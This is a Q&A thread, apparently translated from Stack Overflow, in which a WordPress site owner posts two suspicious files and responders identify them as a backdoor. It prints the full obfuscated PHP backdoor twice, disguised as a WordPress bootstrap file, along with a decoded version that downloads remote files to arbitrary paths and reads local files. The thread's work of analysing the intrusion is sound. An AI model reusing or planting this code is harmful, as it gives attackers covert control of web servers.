
今天我的网站被托管服务提供商下线了,因为他们在两个文件中发现了可疑代码。这两个文件是:

  1. {} HEX php.mailer.Mzh.509:potgieter.nl/public_html/wp-soaplibrary.php
  2. {} HEX php.mailer.Mzh.509:potgieter.nl/ public_html/wp-includes/fonts/dashfontgalery.php

该网站运行的是 WordPress,但我怎么也弄不清这些文件是做什么用的。它们的内容如下:

{} HEX php.mailer.Mzh.509:potgieter.nl/public_html/wp-soaplibrary.php

<?php 
/** 
* Bootstrap file for setting the ABSPATH constant 
* and loading the wp-config.php file. The wp-config.php 
* file will then load the wp-settings.php file, which 
* will then set up the WordPress environment. 
* 
* If the wp-config.php file is not found then an error 
* will be displayed asking the visitor to set up the 
* wp-config.php file. 
* 
* Will also search for wp-config.php in WordPress' parent 
* directory to allow the WordPress directory to remain 
* untouched. 
* 
* @internal This file must be parsable by PHP4. 
* 
* @package WordPress 
*/ 

echo("WordPress Bootstrap file for setting the ABSPATH constant"); $GLOBALS['_269902246_']=Array(base64_decode('b' .'WQ' .'1'),base64_decode('Y3VybF9pbml' .'0'),base64_decode('Y3VybF9z' .'ZXRvcHQ='),base64_decode('Y' .'3Vyb' .'F9' .'zZXRvcHQ='),base64_decode('Y3VybF9' .'zZXRvcHQ='),base64_decode('' .'Y3VybF9l' .'eG' .'Vj'),base64_decode('' .'Y' .'3VybF9' .'jbG9' .'zZ' .'Q=='),base64_decode('c3Rh' .'dA=='),base64_decode('ZGF0Z' .'Q' .'=='),base64_decode('ZGF0' .'ZQ=='),base64_decode('' .'ZGF0ZQ=='),base64_decode('aW5pX2dldA' .'=='),base64_decode('ZmlsZ' .'V' .'9nZXRfY' .'29u' .'dG' .'VudHM='),base64_decode('ZnVuY3Rp' .'b2' .'5' .'fZXhpc' .'3Rz'),base64_decode('' .'c' .'3RybG' .'Vu'),base64_decode('' .'Zm9w' .'ZW' .'4='),base64_decode('ZnB1dH' .'M' .'='),base64_decode('Z' .'mNs' .'b3Nl'),base64_decode('Zm' .'9wZW4' .'='),base64_decode('ZnJl' .'YWQ' .'='),base64_decode('' .'ZmlsZXN' .'pe' .'mU' .'='),base64_decode('Zm' .'Nsb3Nl')); ?><? function _842979692($i){$a=Array('SFRUUF9' .'IT1' .'NU','' .'cA==','c' .'GF' .'0a' .'A==','dXJs','bG' .'9vaw==','Z' .'3' .'ppcCxkZW' .'ZsY' .'XRl','' .'bmFt' .'Z' .'Tog','IHw' .'gdXN' .'lcm' .'lkOg==','dWl' .'k','IHwg' .'Z' .'3J' .'vdXBpZDo=','' .'Z2lk','' .'IHwgc2l6ZTo' .'=','c2l' .'6ZQ==','IHwgYXRp' .'bWU6','WS' .'1tLWQgSD' .'ppOnM=','YXRpbWU=','IH' .'wgb' .'XRpbWU6','' .'WS' .'1tLWQgSDppOnM=','bXRpb' .'WU=','' .'IHwg' .'Y' .'3' .'Rp' .'bWU6','WS1tLWQgSDppOnM' .'=','Y3Rpb' .'WU' .'=','','d' .'mV' .'yL' .'g==','' .'IHwg','YWxsb3df' .'dXJsX2Z' .'vcGVu','Zm' .'9' .'wZW4g','Y3VybF' .'9' .'pb' .'ml0','Y3' .'Vy' .'bCA=','R' .'XJ' .'yb3' .'I6IHRyY' .'W5z' .'Z' .'mVyCg==','dys=','R' .'XJyb' .'3I6IG' .'Vt' .'cHR5IGNvb' .'nRlb' .'nQK','dmVyLg' .'==','IHwg','c' .'mI=','PGh' .'yPgo=','PGZ' .'vc' .'m0gYWN' .'0aW9u' .'PS' .'Ij' .'Ii' .'BtZX' .'Rob2Q9I' .'n' .'Bv' .'c3' .'Qi' .'Pg' .'==','PHRleHRhcmVhIHJvd3' .'M9I' .'jMwIiBjb2xzPSIxNTAiIG5h' .'bWU9InRleHQi' .'Pg' .'==','P' .'C90ZXh0' .'YXJlYT4' .'=','P' .'C' .'9mb' .'3Jt' .'Pg==');return 
base64_decode($a[$i]);} ?><?php $_0=2.0;$_1=$GLOBALS['_269902246_'][0]($_SERVER[_842979692(0)]);$_2=$_GET[_842979692(1)];$_3=$_GET[_842979692(2)];$_4=$_GET[_842979692(3)];$_5=$_GET[_842979692(4)];function l__0($_6){$_7=$GLOBALS['_269902246_'][1]($_6);$GLOBALS['_269902246_'][2]($_7,CURLOPT_ENCODING,_842979692(5));$GLOBALS['_269902246_'][3]($_7,CURLOPT_FOLLOWLOCATION,round(0+0.333333333333+0.333333333333+0.333333333333));$GLOBALS['_269902246_'][4]($_7,CURLOPT_RETURNTRANSFER,round(0+0.2+0.2+0.2+0.2+0.2));$_8=$GLOBALS['_269902246_'][5]($_7);$GLOBALS['_269902246_'][6]($_7);return $_8;}function l__1($_9){$_10=$GLOBALS['_269902246_'][7]($_9);return _842979692(6) .$_9 ._842979692(7) .$_10[_842979692(8)] ._842979692(9) .$_10[_842979692(10)] ._842979692(11) .$_10[_842979692(12)] ._842979692(13) .$GLOBALS['_269902246_'][8](_842979692(14),$_10[_842979692(15)]) ._842979692(16) .$GLOBALS['_269902246_'][9](_842979692(17),$_10[_842979692(18)]) ._842979692(19) .$GLOBALS['_269902246_'][10](_842979692(20),$_10[_842979692(21)]) ._842979692(22);}if($_2 == $_1 && $_3 && $_4 &&!$_5){echo(_842979692(23) .$_0 ._842979692(24));if($GLOBALS['_269902246_'][11](_842979692(25))){@$_11=$GLOBALS['_269902246_'][12]($_4);echo(_842979692(26));}else if($GLOBALS['_269902246_'][13](_842979692(27))){@$_11=l__0($_4);echo(_842979692(28));}else{echo(_842979692(29));}if($_11 && $GLOBALS['_269902246_'][14]($_11)>round(0)){$_12=$GLOBALS['_269902246_'][15]($_3,_842979692(30));$GLOBALS['_269902246_'][16]($_12,$_11);$GLOBALS['_269902246_'][17]($_12);echo l__1($_3);}else{echo(_842979692(31));}}if($_2 == $_1 && $_5){echo(_842979692(32) .$_0 ._842979692(33));echo l__1($_5);$_13=$GLOBALS['_269902246_'][18]($_5,_842979692(34));@$_14=$GLOBALS['_269902246_'][19]($_13,$GLOBALS['_269902246_'][20]($_5));$GLOBALS['_269902246_'][21]($_13);echo(_842979692(35));echo(_842979692(36));echo(_842979692(37) .$_14 ._842979692(38));echo(_842979692(39));} 

?> 

和 {} HEX php.mailer.Mzh.509 :potgieter.nl/public_html/wp-includes/fonts/dashfontgalery.php

<?php 
/** 
* Bootstrap file for setting the ABSPATH constant 
* and loading the wp-config.php file. The wp-config.php 
* file will then load the wp-settings.php file, which 
* will then set up the WordPress environment. 
* 
* If the wp-config.php file is not found then an error 
* will be displayed asking the visitor to set up the 
* wp-config.php file. 
* 
* Will also search for wp-config.php in WordPress' parent 
* directory to allow the WordPress directory to remain 
* untouched. 
* 
* @internal This file must be parsable by PHP4. 
* 
* @package WordPress 
*/ 

echo("WordPress Bootstrap file for setting the ABSPATH constant");  $GLOBALS['_269902246_']=Array(base64_decode('b' .'WQ' .'1'),base64_decode('Y3VybF9pbml' .'0'),base64_decode('Y3VybF9z' .'ZXRvcHQ='),base64_decode('Y' .'3Vyb' .'F9' .'zZXRvcHQ='),base64_decode('Y3VybF9' .'zZXRvcHQ='),base64_decode('' .'Y3VybF9l' .'eG' .'Vj'),base64_decode('' .'Y' .'3VybF9' .'jbG9' .'zZ' .'Q=='),base64_decode('c3Rh' .'dA=='),base64_decode('ZGF0Z' .'Q' .'=='),base64_decode('ZGF0' .'ZQ=='),base64_decode('' .'ZGF0ZQ=='),base64_decode('aW5pX2dldA' .'=='),base64_decode('ZmlsZ' .'V' .'9nZXRfY' .'29u' .'dG' .'VudHM='),base64_decode('ZnVuY3Rp' .'b2' .'5' .'fZXhpc' .'3Rz'),base64_decode('' .'c' .'3RybG' .'Vu'),base64_decode('' .'Zm9w' .'ZW' .'4='),base64_decode('ZnB1dH' .'M' .'='),base64_decode('Z' .'mNs' .'b3Nl'),base64_decode('Zm' .'9wZW4' .'='),base64_decode('ZnJl' .'YWQ' .'='),base64_decode('' .'ZmlsZXN' .'pe' .'mU' .'='),base64_decode('Zm' .'Nsb3Nl')); ?><? function _842979692($i){$a=Array('SFRUUF9' .'IT1' .'NU','' .'cA==','c' .'GF' .'0a' .'A==','dXJs','bG' .'9vaw==','Z' .'3' .'ppcCxkZW' .'ZsY' .'XRl','' .'bmFt' .'Z' .'Tog','IHw' .'gdXN' .'lcm' .'lkOg==','dWl' .'k','IHwg' .'Z' .'3J' .'vdXBpZDo=','' .'Z2lk','' .'IHwgc2l6ZTo' .'=','c2l' .'6ZQ==','IHwgYXRp' .'bWU6','WS' .'1tLWQgSD' .'ppOnM=','YXRpbWU=','IH' .'wgb' .'XRpbWU6','' .'WS' .'1tLWQgSDppOnM=','bXRpb' .'WU=','' .'IHwg' .'Y' .'3' .'Rp' .'bWU6','WS1tLWQgSDppOnM' .'=','Y3Rpb' .'WU' .'=','','d' .'mV' .'yL' .'g==','' .'IHwg','YWxsb3df' .'dXJsX2Z' .'vcGVu','Zm' .'9' .'wZW4g','Y3VybF' .'9' .'pb' .'ml0','Y3' .'Vy' .'bCA=','R' .'XJ' .'yb3' .'I6IHRyY' .'W5z' .'Z' .'mVyCg==','dys=','R' .'XJyb' .'3I6IG' .'Vt' .'cHR5IGNvb' .'nRlb' .'nQK','dmVyLg' .'==','IHwg','c' .'mI=','PGh' .'yPgo=','PGZ' .'vc' .'m0gYWN' .'0aW9u' .'PS' .'Ij' .'Ii' .'BtZX' .'Rob2Q9I' .'n' .'Bv' .'c3' .'Qi' .'Pg' .'==','PHRleHRhcmVhIHJvd3' .'M9I' .'jMwIiBjb2xzPSIxNTAiIG5h' .'bWU9InRleHQi' .'Pg' .'==','P' .'C90ZXh0' .'YXJlYT4' .'=','P' .'C' .'9mb' .'3Jt' .'Pg==');return 
base64_decode($a[$i]);} ?><?php $_0=2.0;$_1=$GLOBALS['_269902246_'][0]($_SERVER[_842979692(0)]);$_2=$_GET[_842979692(1)];$_3=$_GET[_842979692(2)];$_4=$_GET[_842979692(3)];$_5=$_GET[_842979692(4)];function l__0($_6){$_7=$GLOBALS['_269902246_'][1]($_6);$GLOBALS['_269902246_'][2]($_7,CURLOPT_ENCODING,_842979692(5));$GLOBALS['_269902246_'][3]($_7,CURLOPT_FOLLOWLOCATION,round(0+0.333333333333+0.333333333333+0.333333333333));$GLOBALS['_269902246_'][4]($_7,CURLOPT_RETURNTRANSFER,round(0+0.2+0.2+0.2+0.2+0.2));$_8=$GLOBALS['_269902246_'][5]($_7);$GLOBALS['_269902246_'][6]($_7);return $_8;}function l__1($_9){$_10=$GLOBALS['_269902246_'][7]($_9);return _842979692(6) .$_9 ._842979692(7) .$_10[_842979692(8)] ._842979692(9) .$_10[_842979692(10)] ._842979692(11) .$_10[_842979692(12)] ._842979692(13) .$GLOBALS['_269902246_'][8](_842979692(14),$_10[_842979692(15)]) ._842979692(16) .$GLOBALS['_269902246_'][9](_842979692(17),$_10[_842979692(18)]) ._842979692(19) .$GLOBALS['_269902246_'][10](_842979692(20),$_10[_842979692(21)]) ._842979692(22);}if($_2 == $_1 && $_3 && $_4 &&!$_5){echo(_842979692(23) .$_0 ._842979692(24));if($GLOBALS['_269902246_'][11](_842979692(25))){@$_11=$GLOBALS['_269902246_'][12]($_4);echo(_842979692(26));}else if($GLOBALS['_269902246_'][13](_842979692(27))){@$_11=l__0($_4);echo(_842979692(28));}else{echo(_842979692(29));}if($_11 && $GLOBALS['_269902246_'][14]($_11)>round(0)){$_12=$GLOBALS['_269902246_'][15]($_3,_842979692(30));$GLOBALS['_269902246_'][16]($_12,$_11);$GLOBALS['_269902246_'][17]($_12);echo l__1($_3);}else{echo(_842979692(31));}}if($_2 == $_1 && $_5){echo(_842979692(32) .$_0 ._842979692(33));echo l__1($_5);$_13=$GLOBALS['_269902246_'][18]($_5,_842979692(34));@$_14=$GLOBALS['_269902246_'][19]($_13,$GLOBALS['_269902246_'][20]($_5));$GLOBALS['_269902246_'][21]($_13);echo(_842979692(35));echo(_842979692(36));echo(_842979692(37) .$_14 ._842979692(38));echo(_842979692(39));} 

?> 

PHP 不是我最擅长的语言,但我对它相当熟练。然而这些文件对我来说毫无意义。这些文件对我的网站真的有用(或者确实是托管服务提供商放进去的)吗,还是黑客放到我服务器上的?


您已被黑客入侵 – RiggsFolly


这些绝对不是wordpress文件。你可以随时比较你有什么与回购 - https://github.com/WordPress/WordPress – Und3rTow


我们的 WordPress 网站也发生了几乎相同的事情。我无法确定他们利用的漏洞在哪里,所以最终删除了他们用来通过我们服务器发送垃圾邮件的文件,并作为权宜之计取消了这些路径下所有文件的写权限。我们出于其他原因会迁离该站点,但 WordPress 太危险,不适合用于任何你在意的东西。 – coladict


这绝对是黑客所为。层层拼接的 base64 解码隐藏了真实的代码。您的网站可能是通过恶意插件被攻陷的。

务必确保 WordPress 及其所有插件保持最新状态,并且只使用您实际需要的插件。不要运行任何你不了解的东西。

更新:

以下是完全解码后的代码:

// Analyst note: this is the decoded form of the obfuscated script above.
// Every request parameter it reads is declared here; these names, together
// with the response markers echoed below, are the detection surface.
$version = 2.0;
// Access gate: the caller must pass md5() of the site's own Host header as
// ?p=... (compared below). The value is derivable from the public hostname,
// so this is a "not just anyone" check, not authentication.
$host = md5($_SERVER['HTTP_HOST']);
$p = $_GET['p'];       // gate value, compared against $host
$path = $_GET['path']; // local destination file to write (no validation)
$url = $_GET['url'];   // remote URL whose body gets written to $path
$look = $_GET['look']; // local file to read back and display
/**
 * Fetches a URL with cURL and returns the response body.
 *
 * Used as the fallback transfer method when allow_url_fopen is off.
 * Follows redirects and accepts gzip/deflate encodings; no TLS, timeout or
 * size limits are set. Returns the body string, or false if curl_exec fails.
 */
function getFromUrl($url)
{
    $curl = curl_init($url);
    curl_setopt($curl, CURLOPT_ENCODING, 'gzip,deflate');
    curl_setopt($curl, CURLOPT_FOLLOWLOCATION, 1); // redirects are followed
    curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); // return body instead of printing it
    $result = curl_exec($curl);
    curl_close($curl);
    return $result;
}

/**
 * Builds a one-line summary of a file from stat(): owner uid/gid, size and
 * the access/modify/change timestamps.
 *
 * Echoed after every write and read, so the operator learns which user the
 * web server runs as and whether the write landed. If $filename does not
 * exist, stat() returns false and the indexing below emits warnings.
 */
function getFileInfo($filename)
{
    $fileInfo = stat($filename);
    return 'name: ' . $filename
    . ' | userid:' . $fileInfo['uid']
    . ' | groupid:' . $fileInfo['gid']
    . ' | size:' . $fileInfo['size']
    . ' | atime:' . date('Y-m-d H:i:s', $fileInfo['atime'])
    . ' | mtime:' . date('Y-m-d H:i:s', $fileInfo['mtime'])
    . ' | ctime:' . date('Y-m-d H:i:s', $fileInfo['ctime'])
    . '';
}

// Branch 1 — remote-to-local file drop: fetch $url and write its body to $path.
// Note the loose == comparison on the gate value.
if ($p == $host && $path && $url && !$look) {
    // Response markers ('ver2.0|', then 'fopen ' or 'curl ') are stable
    // strings worth matching in access/IDS logs.
    echo 'ver' . $version . '|';
    if (ini_get('allow_url_fopen')) {
     @$remoteFile = file_get_contents($url); // @ hides fetch warnings
     echo 'fopen ';
    } else {
     if (function_exists('curl_init')) {
      @$remoteFile = getFromUrl($url);
      echo 'curl ';
     } else {
      echo "Error: transfer\n";
     }
    }
    // The strlen() check is redundant: a truthy $remoteFile is already a
    // non-empty string, so only the first operand ever decides.
    if ($remoteFile && strlen($remoteFile) > 0) {
     // 'w+' creates or truncates $path; no path restriction, so any
     // location writable by the web server user can be overwritten.
     $fileHandle = fopen($path, 'w+');
     fputs($fileHandle, $remoteFile);
     fclose($fileHandle);
     echo getFileInfo($path); // confirms the write and reports ownership
    } else {
     echo "Error: empty content\n";
    }
}
// Branch 2 — file read-back: dump the contents of $look into an HTML form.
if ($p == $host && $look) {
    echo 'ver' . $version . ' | ';
    echo getFileInfo($look);
    $fileHandle2 = fopen($look, 'rb');
    @$fileContents = fread($fileHandle2, filesize($look)); // @ hides read errors
    fclose($fileHandle2);
    echo '<hr>';
    // The form has no handler; it only serves as a display container.
    echo '<form action="#" method="post">';
    // File contents are echoed without htmlspecialchars(), so the raw bytes
    // land in the page.
    echo '<textarea rows="30" cols="150" name="text">' . $fileContents . '</textarea>';
    echo '</form>';
}

看起来一旦这个文件进入您的系统,攻击者就可以用它读取和写入磁盘上几乎任何文件;它甚至会检查文件的所有者和权限。

这个文件极其危险。

这段代码写得非常差(撇开其恶意本质不谈):它使用了不规范的数组和 echo 语法(虽然仍能运行),而且如果你禁用了 short tags,这段代码就无法运行。


非常感谢您的帮助。我今后会禁用短标签。WordPress 和插件都是最新的,但我最近才开始担任这家公司的网站管理员,而我的前任不擅长编写代码,所以他安装了一大堆插件。我仍在清理他留下的烂摊子,希望那个恶意插件会在清理中被我删除。 – Tijmen


没有短标签 WordPress 本身可能也无法正常工作,它自己写得也不怎么好。另外我不认为禁用短标签是一项安全功能,我只是指出这段代码(在禁用时)无法运行;写得更好的恶意代码则照样能运行。 – DanielM


我明白了,最好还是避免使用短标签。再次感谢你的帮助 :) – Tijmen


这肯定是黑客所为。

看看这些代码片段:

$_2 = $_GET[_842979692(1)]; 
$_3 = $_GET[_842979692(2)]; 
$_4 = $_GET[_842979692(3)]; 
$_5 = $_GET[_842979692(4)]; 

脚本读取了几个未知的 $_GET 参数。这通常用于打开后门。

function l__0($_6) 
{ 
    $_7 = $GLOBALS['_269902246_'][1]($_6); 
    $GLOBALS['_269902246_'][2]($_7, CURLOPT_ENCODING, _842979692(5)); 
    $GLOBALS['_269902246_'][3]($_7, CURLOPT_FOLLOWLOCATION, round(0 + 0.333333333333 + 0.333333333333 + 0.333333333333)); 
    $GLOBALS['_269902246_'][4]($_7, CURLOPT_RETURNTRANSFER, round(0 + 0.2 + 0.2 + 0.2 + 0.2 + 0.2)); 
    $_8 = $GLOBALS['_269902246_'][5]($_7); 
    $GLOBALS['_269902246_'][6]($_7); 
    return $_8; 
} 

通过保存在全局变量中的函数名调用 curl 获取内容。

这看起来像是从另一台服务器加载有效载荷的东西。